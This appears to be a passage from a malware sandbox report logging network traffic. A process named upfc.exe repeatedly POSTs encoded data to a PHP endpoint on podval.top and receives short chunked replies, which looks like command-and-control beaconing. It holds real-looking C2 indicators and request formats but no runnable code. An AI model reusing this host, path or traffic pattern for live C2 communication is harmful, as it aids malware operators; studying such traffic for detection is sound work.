                                                    Jul 3, 2024 16:43:11.119899035 CEST1748OUTData Raw: 5f 5a 5a 5c 5b 5c 57 5a 58 56 55 51 50 50 59 53 55 5b 5e 55 51 5f 53 5c 53 41 5f 5c 50 5f 51 50 5e 5b 51 5e 56 5d 57 5e 58 51 5a 50 5f 57 5f 5b 52 50 59 5c 42 5b 52 59 50 5d 54 54 58 5d 57 44 59 56 43 50 5a 5a 58 53 5c 5d 5d 5f 44 5d 46 55 5f 57
                                                    Data Ascii: _ZZ\[\WZXVUQPPYSU[^UQ_S\SA_\P_QP^[Q^V]W^XQZP_W_[RPY\B[RYP]TTX]WDYVCPZZXS\]]_D]FU_WY_WY]]VRPZ\^[ZQ[XP\ZCR]\XU[]CZZFQQ\SQVQTYVZWBZ_X]V_]]YZY^Y_X\\QXP]TZ__\]D^[_RY]\[Y^[^SP]U[[RY[\^U^Y[\^"[%_#$:$30_=.T!=:]0%![3 /+40Z-,"['$Y
                                                    Jul 3, 2024 16:43:11.127140999 CEST25INHTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:43:11.560034037 CEST737INHTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:43:11 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=R3ck7kWQ5sqAmiAOQhLCcsN%2F%2FmReF8mZMs6tUxkbpqLs8%2FR8j%2BkS4BLPYC%2BCshVZv1hWAZEBK1I0iardmcHRmeSMgBHNVW2eRXibCZsz%2BBDPoK4D5Tsjtd8D%2Fl56"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a57a3b0680d0-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 39 38 0d 0a 09 1a 26 00 26 14 35 5a 31 31 20 0a 2d 3d 24 09 3c 03 28 5d 2c 17 22 06 3f 24 2d 5d 3a 10 0c 52 22 3a 2e 18 2a 2f 2c 16 25 0e 0a 54 21 1b 20 5b 04 1c 23 59 3f 2a 25 58 3f 06 0a 0b 31 2f 31 46 24 19 21 59 24 28 21 0b 30 3b 20 04 3c 06 3a 09 27 0c 24 00 29 01 2e 5b 2a 37 07 01 35 24 21 54 02 13 22 1f 25 3e 36 0e 20 20 27 1e 25 33 22 01 27 24 30 09 25 20 32 52 3d 33 39 0b 30 31 30 58 22 3f 05 55 30 01 2e 5f 30 5b 2d 5d 35 38 23 5f 2b 05 29 56 01 33 59 54 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 98&&5Z11 -=$<(],"?$-]:R":.*/,%T! [#Y?*%X?1/1F$!Y$(!0; <:'$).[*75$!T"%>6 '%3"'$0% 2R=39010X"?U0._0[-]58#_+)V3YT0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    81192.168.2.1049799188.114.97.3806960C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jul 3, 2024 16:43:11.687819958 CEST294OUTPOST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 1060
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Jul 3, 2024 16:43:12.041554928 CEST1060OUTData Raw: 5a 50 5f 5f 5b 57 57 5a 58 56 55 51 50 5b 59 54 55 59 5e 58 51 5e 53 5a 53 41 5f 5c 50 5f 51 50 5e 5b 51 5e 56 5d 57 5e 58 51 5a 50 5f 57 5f 5b 52 50 59 5c 42 5b 52 59 50 5d 54 54 58 5d 57 44 59 56 43 50 5a 5a 58 53 5c 5d 5d 5f 44 5d 46 55 5f 57
                                                    Data Ascii: ZP__[WWZXVUQP[YTUY^XQ^SZSA_\P_QP^[Q^V]W^XQZP_W_[RPY\B[RYP]TTX]WDYVCPZZXS\]]_D]FU_WY_WY]]VRPZ\^[ZQ[XP\ZCR]\XU[]CZZFQQ\SQVQTYVZWBZ_X]V_]]YZY^Y_X\\QXP]TZ__\]D^[_RY]\[Y^[^SP]U[[RY[\^U^Y[\^"Y&_;0'0?*.&45,.Y$'#?/>[7(_/,"['$Y -
                                                    Jul 3, 2024 16:43:12.148017883 CEST25INHTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:43:12.559828043 CEST580INHTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:43:12 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=T1o4FVcmko5p3PLkRw1Y9Yy6FcwSSKTT078rOpDgNZkgCh9kYlf6l8o4poOuQJdEIytXfQxZkhIDhIgTMID0EkeDf0%2FSwP%2FvlCufWu%2FohWZHK9BqXXsnsdtU0kJ1"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a58098888cb4-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 34 0d 0a 3b 52 5c 50 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 4;R\P0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    82192.168.2.1049800188.114.97.3806960C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jul 3, 2024 16:43:12.696732044 CEST294OUTPOST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 1060
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Jul 3, 2024 16:43:13.042480946 CEST1060OUTData Raw: 5f 56 5f 5a 5b 5e 57 51 58 56 55 51 50 5d 59 56 55 5e 5e 5a 51 55 53 59 53 41 5f 5c 50 5f 51 50 5e 5b 51 5e 56 5d 57 5e 58 51 5a 50 5f 57 5f 5b 52 50 59 5c 42 5b 52 59 50 5d 54 54 58 5d 57 44 59 56 43 50 5a 5a 58 53 5c 5d 5d 5f 44 5d 46 55 5f 57
                                                    Data Ascii: _V_Z[^WQXVUQP]YVU^^ZQUSYSA_\P_QP^[Q^V]W^XQZP_W_[RPY\B[RYP]TTX]WDYVCPZZXS\]]_D]FU_WY_WY]]VRPZ\^[ZQ[XP\ZCR]\XU[]CZZFQQ\SQVQTYVZWBZ_X]V_]]YZY^Y_X\\QXP]TZ__\]D^[_RY]\[Y^[^SP]U[[RY[\^U^Y[\^"Y%)3$9\%3;]).)T#9==Z0:'4/.727/"['$Y 5
                                                    Jul 3, 2024 16:43:13.147202015 CEST25INHTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:43:13.493649006 CEST584INHTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:43:13 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gqiXbsLOqd%2By2wDZYQLAnRtoKwRV3V%2BTqC5%2FQNup0RkrKIaTTHBYtVmI0OzLKt9%2BjDXK1W%2BRKbKnsF7jAA8J7pr2rgalBXomP76VblAroWbfZjATiGKraRb9Tdgl"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a586ea754283-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 34 0d 0a 3b 52 5c 50 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 4;R\P0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    83192.168.2.1049801188.114.97.3806960C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jul 3, 2024 16:43:13.635381937 CEST294OUTPOST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 1056
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Jul 3, 2024 16:43:13.994719982 CEST1056OUTData Raw: 5a 50 5f 5e 5b 57 52 5a 58 56 55 51 50 59 59 52 55 5e 5e 55 51 5b 53 5a 53 41 5f 5c 50 5f 51 50 5e 5b 51 5e 56 5d 57 5e 58 51 5a 50 5f 57 5f 5b 52 50 59 5c 42 5b 52 59 50 5d 54 54 58 5d 57 44 59 56 43 50 5a 5a 58 53 5c 5d 5d 5f 44 5d 46 55 5f 57
                                                    Data Ascii: ZP_^[WRZXVUQPYYRU^^UQ[SZSA_\P_QP^[Q^V]W^XQZP_W_[RPY\B[RYP]TTX]WDYVCPZZXS\]]_D]FU_WY_WY]]VRPZ\^[ZQ[XP\ZCR]\XU[]CZZFQQ\SQVQTYVZWBZ_X]V_]]YZY^Y_X\\QXP]TZ__\]D^[_RY]\[Y^[^SP]U[[RY[\^U^Y[\^!&_;&*#3V;(-2 =..0C6%33,. 4#;<"['$Y !
                                                    Jul 3, 2024 16:43:14.097179890 CEST25INHTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:43:14.301501036 CEST580INHTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:43:14 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HT6dIAEujcKo9ni%2FxYnNtJ3ji%2B80VopqCErThAdbTZuNHyW0wtpApc8eVvNnBn2JCehAFGzHYzMkZl7Rn3R0IqRG5yozq0UT6AtO5z5ijVU9EpuKJp8uIlS%2FTkYc"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a58ccca6426d-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 34 0d 0a 3b 52 5c 50 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 4;R\P0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    84192.168.2.1049802188.114.97.3806960C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jul 3, 2024 16:43:14.443526983 CEST294OUTPOST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 1060
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Jul 3, 2024 16:43:14.791599989 CEST1060OUTData Raw: 5f 55 5f 5d 5e 5f 57 5f 58 56 55 51 50 5c 59 56 55 5e 5e 5a 51 58 53 58 53 41 5f 5c 50 5f 51 50 5e 5b 51 5e 56 5d 57 5e 58 51 5a 50 5f 57 5f 5b 52 50 59 5c 42 5b 52 59 50 5d 54 54 58 5d 57 44 59 56 43 50 5a 5a 58 53 5c 5d 5d 5f 44 5d 46 55 5f 57
                                                    Data Ascii: _U_]^_W_XVUQP\YVU^^ZQXSXSA_\P_QP^[Q^V]W^XQZP_W_[RPY\B[RYP]TTX]WDYVCPZZXS\]]_D]FU_WY_WY]]VRPZ\^[ZQ[XP\ZCR]\XU[]CZZFQQ\SQVQTYVZWBZ_X]V_]]YZY^Y_X\\QXP]TZ__\]D^[_RY]\[Y^[^SP]U[[RY[\^U^Y[\^"\%9/&*?$0+](>: .!,==Y'"'3R,4#"7-<"['$Y 1
                                                    Jul 3, 2024 16:43:14.908571959 CEST25INHTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:43:15.255477905 CEST586INHTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:43:15 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PqjGoHW99jXWn%2F6zEjdrTuJXbSq3sP2qUyNTH2ryKc%2F4QFXYcHyayivx%2BXrJff%2FekkJDlU%2F4eANJzHWdd4SokTFz1BJuX6mYyB9JhgnEQfwqgKSA%2BCa0LaGaQ8Zk"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a591efe319eb-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 34 0d 0a 3b 52 5c 50 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 4;R\P0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    85192.168.2.1049803188.114.97.3806960C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jul 3, 2024 16:43:15.420603037 CEST294OUTPOST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 1060
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Jul 3, 2024 16:43:15.775877953 CEST1060OUTData Raw: 5f 57 5a 5c 5e 5a 57 5a 58 56 55 51 50 5e 59 50 55 58 5e 58 51 5f 53 5d 53 41 5f 5c 50 5f 51 50 5e 5b 51 5e 56 5d 57 5e 58 51 5a 50 5f 57 5f 5b 52 50 59 5c 42 5b 52 59 50 5d 54 54 58 5d 57 44 59 56 43 50 5a 5a 58 53 5c 5d 5d 5f 44 5d 46 55 5f 57
                                                    Data Ascii: _WZ\^ZWZXVUQP^YPUX^XQ_S]SA_\P_QP^[Q^V]W^XQZP_W_[RPY\B[RYP]TTX]WDYVCPZZXS\]]_D]FU_WY_WY]]VRPZ\^[ZQ[XP\ZCR]\XU[]CZZFQQ\SQVQTYVZWBZ_X]V_]]YZY^Y_X\\QXP]TZ__\]D^[_RY]\[Y^[^SP]U[[RY[\^U^Y[\^"Z1038'3;[*" >=9>.35*$ 7S;8#4;"['$Y
                                                    Jul 3, 2024 16:43:15.866590977 CEST25INHTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:43:16.224643946 CEST582INHTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:43:16 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wD5Y7ajavXgkmcEzTe143JWJyhjo5in4H9B6AkpnyEpXTA7xBI93dBSk%2BUaVDf7BLUckgO%2BBQGuNjip1SRTyttyZTU14%2BxFRhpEH0qmpf5dN5%2BE9H7Yw97brH4Xb"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a597ef708c8f-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 34 0d 0a 3b 52 5c 50 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 4;R\P0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    86192.168.2.1049804188.114.97.3806960C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jul 3, 2024 16:43:16.386534929 CEST294OUTPOST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 1060
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    87192.168.2.1049805188.114.97.3806960C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jul 3, 2024 16:43:16.579525948 CEST294OUTPOST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 1772
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Jul 3, 2024 16:43:16.932291031 CEST1772OUTData Raw: 5f 5b 5a 58 5e 58 52 5f 58 56 55 51 50 5d 59 57 55 50 5e 54 51 5d 53 57 53 41 5f 5c 50 5f 51 50 5e 5b 51 5e 56 5d 57 5e 58 51 5a 50 5f 57 5f 5b 52 50 59 5c 42 5b 52 59 50 5d 54 54 58 5d 57 44 59 56 43 50 5a 5a 58 53 5c 5d 5d 5f 44 5d 46 55 5f 57
                                                    Data Ascii: _[ZX^XR_XVUQP]YWUP^TQ]SWSA_\P_QP^[Q^V]W^XQZP_W_[RPY\B[RYP]TTX]WDYVCPZZXS\]]_D]FU_WY_WY]]VRPZ\^[ZQ[XP\ZCR]\XU[]CZZFQQ\SQVQTYVZWBZ_X]V_]]YZY^Y_X\\QXP]TZ__\]D^[_RY]\[Y^[^SP]U[[RY[\^U^Y[\^"Z%:$097$3'\=.9R75\9-6'%)\''-. ?8"['$Y 5
                                                    Jul 3, 2024 16:43:17.046717882 CEST25INHTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:43:17.420027018 CEST728INHTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:43:17 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=d0QTR%2FN4AZ8eDx6VKegIbsyFyaz2kUn7R3AKPPi3cQdfwJapKqd%2BtJv7681YodJbC14IL%2BJMEL8JvWUjUZOlkK398pZGt8BoQPGZMnq8OEEc%2FJ2rcA%2FKIjkUga7S"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a59f3a7a19aa-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 39 38 0d 0a 09 1a 26 07 31 14 25 1e 25 0c 2c 0b 2e 2e 20 0f 3c 3e 38 5c 2d 29 2d 5b 3c 42 21 1e 2c 2d 21 08 20 29 21 06 3f 3f 2c 15 25 30 23 0e 36 31 20 5b 04 1c 20 00 3f 3a 2d 5b 29 38 27 52 25 12 35 05 30 34 25 11 24 5d 31 0e 33 5e 23 11 28 2b 22 0f 27 1c 27 10 3e 28 39 06 3c 37 07 00 21 1e 21 54 02 13 22 1f 30 3d 1c 0f 34 23 28 0b 31 56 39 5d 30 1d 3b 1b 25 33 32 1d 3e 0a 2a 57 27 08 3c 5c 35 06 3b 54 27 16 08 5b 24 2d 0b 5d 22 28 23 5f 2b 05 29 56 01 33 59 54 0d 0a
                                                    Data Ascii: 98&1%%,.. <>8\-)-[<B!,-! )!??,%0#61 [ ?:-[)8'R%504%$]13^#(+"''>(9<7!!T"0=4#(1V9]0;%32>*W'<\5;T'[$-]"(#_+)V3YT
                                                    Jul 3, 2024 16:43:17.510787964 CEST5INData Raw: 30 0d 0a 0d 0a
                                                    Data Ascii: 0
                                                    Jul 3, 2024 16:43:17.514166117 CEST270OUTPOST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 1060
                                                    Expect: 100-continue
                                                    Jul 3, 2024 16:43:17.612626076 CEST25INHTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:43:17.612823009 CEST1060OUTData Raw: 5f 5b 5a 5e 5e 5f 52 5b 58 56 55 51 50 5b 59 5a 55 5b 5e 59 51 5f 53 5f 53 41 5f 5c 50 5f 51 50 5e 5b 51 5e 56 5d 57 5e 58 51 5a 50 5f 57 5f 5b 52 50 59 5c 42 5b 52 59 50 5d 54 54 58 5d 57 44 59 56 43 50 5a 5a 58 53 5c 5d 5d 5f 44 5d 46 55 5f 57
                                                    Data Ascii: _[Z^^_R[XVUQP[YZU[^YQ_S_SA_\P_QP^[Q^V]W^XQZP_W_[RPY\B[RYP]TTX]WDYVCPZZXS\]]_D]FU_WY_WY]]VRPZ\^[ZQ[XP\ZCR]\XU[]CZZFQQ\SQVQTYVZWBZ_X]V_]]YZY^Y_X\\QXP]TZ__\]D^[_RY]\[Y^[^SP]U[[RY[\^U^Y[\^"]':?'*803<(-% -]--935Y$##V/=' ',<"['$Y -
                                                    Jul 3, 2024 16:43:17.912786007 CEST581INHTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:43:17 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8nJYAJMuyM%2F1IstOpPCdq5EO5Se3NbusLkjINu4MA7lKSCbFr8oD4rIfeDI4gZKof%2Fi%2FYPgU6XO%2FdpigzujZ0qKZstn%2F19Sqb6k6%2BdqQ3rNAD2N1nfZDTur7bN71"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a5a2cd5a19aa-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 34 0d 0a 3b 52 5c 50 0d 0a
                                                    Data Ascii: 4;R\P
                                                    Jul 3, 2024 16:43:18.057023048 CEST5INData Raw: 30 0d 0a 0d 0a
                                                    Data Ascii: 0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    88192.168.2.1049806188.114.97.3806960C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jul 3, 2024 16:43:16.708558083 CEST294OUTPOST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 1060
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Jul 3, 2024 16:43:17.057207108 CEST1060OUTData Raw: 5a 55 5f 5d 5b 56 52 5b 58 56 55 51 50 5c 59 56 55 5e 5e 5d 51 5e 53 56 53 41 5f 5c 50 5f 51 50 5e 5b 51 5e 56 5d 57 5e 58 51 5a 50 5f 57 5f 5b 52 50 59 5c 42 5b 52 59 50 5d 54 54 58 5d 57 44 59 56 43 50 5a 5a 58 53 5c 5d 5d 5f 44 5d 46 55 5f 57
                                                    Data Ascii: ZU_][VR[XVUQP\YVU^^]Q^SVSA_\P_QP^[Q^V]W^XQZP_W_[RPY\B[RYP]TTX]WDYVCPZZXS\]]_D]FU_WY_WY]]VRPZ\^[ZQ[XP\ZCR]\XU[]CZZFQQ\SQVQTYVZWBZ_X]V_]]YZY^Y_X\\QXP]TZ__\]D^[_RY]\[Y^[^SP]U[[RY[\^U^Y[\^"Y1:30_7]$ ((>! )Y9.-0%' (;>$ ?-<"['$Y 1
                                                    Jul 3, 2024 16:43:17.174099922 CEST25INHTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:43:17.386924982 CEST586INHTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:43:17 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wpa9aUJkM4AN%2FUYz7aj2K4hqYipPtyfG5YLBkYtgGfC21bUI2QllfdpZVHECrVVrVgwTxxqesXi8tukLk%2BNkYvuMt0DerBRDLRhfn%2F94R7V%2FVZF7%2BoKD0%2BQeZrHF"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a5a00e7180d9-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 34 0d 0a 3b 52 5c 50 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 4;R\P0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    89192.168.2.1049807188.114.97.3806960C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jul 3, 2024 16:43:18.189326048 CEST270OUTPOST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 1060
                                                    Expect: 100-continue
                                                    Jul 3, 2024 16:43:18.541557074 CEST1060OUTData Raw: 5f 5a 5a 5e 5b 5b 57 5d 58 56 55 51 50 5b 59 56 55 50 5e 54 51 5b 53 56 53 41 5f 5c 50 5f 51 50 5e 5b 51 5e 56 5d 57 5e 58 51 5a 50 5f 57 5f 5b 52 50 59 5c 42 5b 52 59 50 5d 54 54 58 5d 57 44 59 56 43 50 5a 5a 58 53 5c 5d 5d 5f 44 5d 46 55 5f 57
                                                    Data Ascii: _ZZ^[[W]XVUQP[YVUP^TQ[SVSA_\P_QP^[Q^V]W^XQZP_W_[RPY\B[RYP]TTX]WDYVCPZZXS\]]_D]FU_WY_WY]]VRPZ\^[ZQ[XP\ZCR]\XU[]CZZFQQ\SQVQTYVZWBZ_X]V_]]YZY^Y_X\\QXP]TZ__\]D^[_RY]\[Y^[^SP]U[[RY[\^U^Y[\^"Y'*/3*'37_>%S [9>"$&=]003S-.< 20Y-,"['$Y -
                                                    Jul 3, 2024 16:43:18.828319073 CEST25INHTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:43:19.161552906 CEST578INHTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:43:19 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7wZWriVHMtjt6C3R39Q3F21WWHqJCRDVl0eTa37P58dMRc4BLqbCQcrdSYn%2F6cW9ENWjKCLgBwiCjRejN1BZrsXjO2xG6D3kWvY6jqAgp8f0Cd7hKTEioOaxehr%2B"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a5aa4e154373-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 34 0d 0a 3b 52 5c 50 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 4;R\P0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    90192.168.2.1049808188.114.97.3806960C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jul 3, 2024 16:43:19.295015097 CEST294OUTPOST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 1060
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
